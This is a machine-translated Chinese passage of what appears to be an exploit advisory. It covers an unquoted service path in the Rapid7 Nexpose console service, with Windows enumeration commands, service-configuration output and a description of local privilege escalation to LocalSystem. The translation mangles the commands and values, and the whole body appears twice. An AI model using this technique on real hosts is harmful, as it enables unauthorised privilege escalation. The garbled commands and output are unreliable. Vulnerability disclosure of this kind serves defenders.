#利用title: rapid7 nexpose-“ nexposeconsole”无引用的服务路径
#日期: 2024-04-2
#利用作者:沙特阿莱纳齐
#供应商HomePage3360 https://www.rapid7.com/
#软件link: https://www.rapid7.com/products/nexpose/
#版本: 6.6.240
#tested: Windows 10 x64
#要发现无引用的服务路径的步骤:
C: \ USER \ saudhwmic服务中的“ name suke”%nexposeconsole%'获取名称,displayName,pathname,startmode,startMode,startMode,startname
displayname name pathname startmode startname
Nexpose Security Console NexPoseConsole'C: \ Program Files \ Rapid7 \ Nexpose \ nsc \ bin \ bin \ nexlaunch.exe'auto localsystem
#服务INFO:
C: \ USER \ SAUDHSC QC Nexposeconsole
[SC] QueryServiceConfig成功
service_name: nexposeconsole
类型: 10 WIN32_OUNT_PROCESS
start_type : 2 auto_start
error_control : 0忽略
binary_path_name :'C: \ Program Files \ Rapid7 \ nexpose \ nsc \ bin \ nexlaunch.exe'
LOAD_ORDER_GROUP :
标签: 0
display_name : Nexpose安全控制台
依赖项:
service_start_name :本地系统
#Exploit:
成功的尝试将要求本地用户能够将其代码插入由OS或其他安全应用程序未发现的系统根路径中,在应用程序启动或重新启动时可能会执行它。如果成功,本地用户的代码将使用应用程序的特权提高。
#日期: 2024-04-2
#利用作者:沙特阿莱纳齐
#供应商HomePage3360 https://www.rapid7.com/
#软件link: https://www.rapid7.com/products/nexpose/
#版本: 6.6.240
#tested: Windows 10 x64
#要发现无引用的服务路径的步骤:
C: \ USER \ saudhwmic服务中的“ name suke”%nexposeconsole%'获取名称,displayName,pathname,startmode,startMode,startMode,startname
displayname name pathname startmode startname
Nexpose Security Console NexPoseConsole'C: \ Program Files \ Rapid7 \ Nexpose \ nsc \ bin \ bin \ nexlaunch.exe'auto localsystem
#服务INFO:
C: \ USER \ SAUDHSC QC Nexposeconsole
[SC] QueryServiceConfig成功
service_name: nexposeconsole
类型: 10 WIN32_OUNT_PROCESS
start_type : 2 auto_start
error_control : 0忽略
binary_path_name :'C: \ Program Files \ Rapid7 \ nexpose \ nsc \ bin \ nexlaunch.exe'
LOAD_ORDER_GROUP :
标签: 0
display_name : Nexpose安全控制台
依赖项:
service_start_name :本地系统
#Exploit:
成功的尝试将要求本地用户能够将其代码插入由OS或其他安全应用程序未发现的系统根路径中,在应用程序启动或重新启动时可能会执行它。如果成功,本地用户的代码将使用应用程序的特权提高。